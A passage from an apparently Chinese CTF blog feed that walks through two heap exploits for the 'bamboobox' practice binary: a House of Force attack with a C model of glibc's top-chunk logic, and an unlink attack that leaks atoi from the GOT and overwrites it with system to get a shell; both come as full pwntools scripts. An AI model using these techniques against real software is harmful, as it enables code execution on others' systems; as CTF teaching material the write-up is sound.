<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>Exploitation</h3><p>Overwrite one of the pointers with the pointer to the magic function. goodbye_message is called when the program exits, so overwriting goodbye_message hijacks control flow:</p>
<ol>
<li><p>Allocate a chunk</p>
<p><img src="/article/house%20of%20force/image-20211019162935944.png" alt="image-20211019162935944"></p>
</li>
<li><p>Use the heap overflow to modify the top chunk</p>
<p><img src="/article/house%20of%20force/image-20211019163644606.png" alt="image-20211019163644606"></p>
<p>The target address is <code>0xf87000</code>.</p>
</li>
<li><p>Allocate "upward" (toward lower addresses) with malloc(negative)</p>
<p>negative size = 0xf87000 - 0xf87050 - 0x10 = -96 (-0x60)</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">add(-<span class="number">0x60</span>,<span class="string">''</span>)</span><br></pre></td></tr></table></figure>
<p><img src="/article/house%20of%20force/image-20211019164429485.png" alt="image-20211019164429485"></p>
<p>The next allocated chunk is at 0x15e7000; because of the size check, the request size is 0x10.</p>
</li>
<li><p>Allocate a 0x10 chunk and write magic_addr into it</p>
<p><img src="/article/house%20of%20force/image-20211019164702377.png" alt="image-20211019164702377"></p>
</li>
</ol>
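<p>As an added example (my own model, not code from the page or from glibc), the C program below models the top-chunk allocation path of glibc 2.23 that the steps above rely on, including request2size rounding and the unsigned size comparison that lets a -0x60 request move top from 0xf87050 to 0xf87000, and then applies the "malloc(): corrupted top size" check that glibc 2.29 added, which rejects the overwritten top size. The arena_t struct, the system_mem value of 0x21000 and the function names are my own constructions.</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SIZE_SZ            sizeof(size_t)
#define MALLOC_ALIGN_MASK  (2 * SIZE_SZ - 1)
#define MINSIZE            (4 * SIZE_SZ)
#define SIZE_BITS          0x7

/* glibc request2size(): add room for the size field and round up to 16 bytes.
 * Unsigned arithmetic, so a "negative" request silently wraps instead of failing. */
size_t request2size(size_t req)
{
    if (req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)
        return MINSIZE;
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
}

/* The page's formula: the request that makes top land exactly on target. */
long force_request(uintptr_t top, uintptr_t target)
{
    return (long)(target - top - 2 * SIZE_SZ);
}

/* Minimal arena state (hypothetical struct): where top is, its size field, and
 * how much memory the arena really owns (av->system_mem in glibc). */
typedef struct {
    uintptr_t top;
    size_t    top_size;
    size_t    system_mem;
} arena_t;

/* Models the "use top" path of _int_malloc. Returns the user pointer of the chunk
 * carved from top, or 0 where glibc would abort or fall back to sysmalloc.
 * modern != 0 applies the "malloc(): corrupted top size" check from glibc 2.29. */
uintptr_t top_alloc(arena_t *av, size_t req, int modern)
{
    size_t nb = request2size(req);
    size_t size = av->top_size & ~(size_t)SIZE_BITS;
    if (modern && size > av->system_mem)
        return 0;                                   /* top size larger than the whole arena */
    if (size < nb + MINSIZE)
        return 0;                                   /* top too small: would call sysmalloc */
    uintptr_t victim = av->top;
    av->top = victim + nb;                          /* wraps around when nb is "negative" */
    av->top_size = size - nb;
    return victim + 2 * SIZE_SZ;
}

/* Replays the page's sequence on a fresh model arena whose top size field holds
 * eight 0xff bytes: malloc(force_request), then malloc(0x10). Returns the user
 * pointer of the second allocation, or 0 if the first one was refused. */
uintptr_t replay_house_of_force(uintptr_t top, uintptr_t target, int modern)
{
    arena_t av = { top, (size_t)-1, 0x21000 };     /* system_mem: constructed, one 132 KiB heap */
    if (top_alloc(&av, (size_t)force_request(top, target), modern) == 0)
        return 0;
    return top_alloc(&av, 0x10, modern);
}

int main(void)
{
    /* Addresses from the page: top chunk at 0xf87050, target chunk at 0xf87000. */
    uintptr_t top = 0xf87050, target = 0xf87000;
    long req = force_request(top, target);
    printf("request = %ld (0x%lx), request2size = 0x%zx\n",
           req, (unsigned long)req, request2size((size_t)req));
    uintptr_t p223 = replay_house_of_force(top, target, 0);
    printf("glibc 2.23: second malloc(0x10) returns %#lx\n", (unsigned long)p223);
    uintptr_t p229 = replay_house_of_force(top, target, 1);
    printf("glibc 2.29: second malloc(0x10) returns %#lx (0 = refused by top size check)\n",
           (unsigned long)p229);
    return 0;
}
```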
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 process</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(<span class="string">'./bamboobox'</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">27833</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># elf = 
ELF('./bamboobox')</span></span><br><span class="line"><span class="comment"># libc = ELF('./libc.so.6')</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'1'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,name</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'name:'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'name of item:'</span>,<span class="built_in">str</span>(name))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,size,name</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'3'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'index of item:'</span>,<span class="built_in">str</span>(index)) </span><br><span class="line"> p.sendlineafter(<span class="string">'length of item name:'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'name of the item:'</span>,name)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span 
class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'4'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'index of item:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">magic_addr = <span class="number">0x400D49</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x20</span>,<span class="string">'aaaa'</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x28</span> + <span class="string">'\xff'</span>*<span class="number">8</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="built_in">len</span>(payload),payload)</span><br><span class="line"></span><br><span class="line">add(-<span class="number">0x60</span>,<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x10</span>,p64(magic_addr)*<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'5'</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="Unlink"><a href="#Unlink" class="headerlink" title="Unlink"></a>Unlink</h3><p>Another solution to this challenge.</p>
<h4 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>Exploitation</h4><ul>
<li>Use unlink to move a chunk onto the memory that stores the chunk pointers.</li>
<li>Overwrite the chunk 0 pointer with the GOT address of atoi and leak it.</li>
<li>Overwrite atoi's GOT entry with the address of system.</li>
<li>Supply the argument ‘sh’; the call to atoi then gives a shell.</li>
</ul>
<h4 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 process</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(<span class="string">'./bamboobox'</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">27833</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span 
class="string">'./bamboobox'</span>)</span><br><span class="line">libc = ELF(<span class="string">'./libc/libc-2.23.so'</span>)</span><br><span class="line">atoi_got = elf.got[<span class="string">'atoi'</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,name</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'name:'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'name of item:'</span>,<span class="built_in">str</span>(name))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'3'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'index of item:'</span>,<span class="built_in">str</span>(index)) </span><br><span class="line"> p.sendlineafter(<span class="string">'length of item name:'</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(content)))</span><br><span class="line"> p.sendlineafter(<span class="string">'name of the item:'</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span 
class="line"> p.sendlineafter(<span class="string">'Your choice:'</span>,<span class="string">'4'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'index of item:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x6020c8</span></span><br><span class="line">fd = target - <span class="number">0x18</span></span><br><span class="line">bk = target - <span class="number">0x10</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'aaaa'</span>)</span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">'bbbb'</span>)</span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'cccc'</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x30</span>)</span><br><span class="line">payload += p64(fd) + p64(bk)</span><br><span class="line">payload += <span class="string">'a'</span>*<span class="number">0x10</span></span><br><span class="line">payload += p64(<span class="number">0x30</span>) + p64(<span class="number">0x90</span>)</span><br><span class="line">edit(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">2</span> + p64(<span class="number">0x30</span>) + p64(atoi_got)</span><br><span class="line">edit(<span class="number">0</span>,payload)</span><br><span class="line"></span><br><span class="line">show()</span><br><span class="line">atoi_addr = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">libc_base = 
atoi_addr - libc.sym[<span class="string">'atoi'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">log.success(<span class="built_in">hex</span>(system_addr))</span><br><span class="line">log.success(<span class="built_in">hex</span>(atoi_addr))</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,p64(system_addr))</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>Notes</category>
</categories>
</entry>
<entry>
<title>glibc-all-in-one</title>
<url>/article/glibc-all-in-one/</url>
<content><![CDATA[<h1 id="记glibc-all-in-one使用"><a href="#记glibc-all-in-one使用" class="headerlink" title="记glibc-all-in-one使用"></a>Notes on using glibc-all-in-one</h1><span id="more"></span>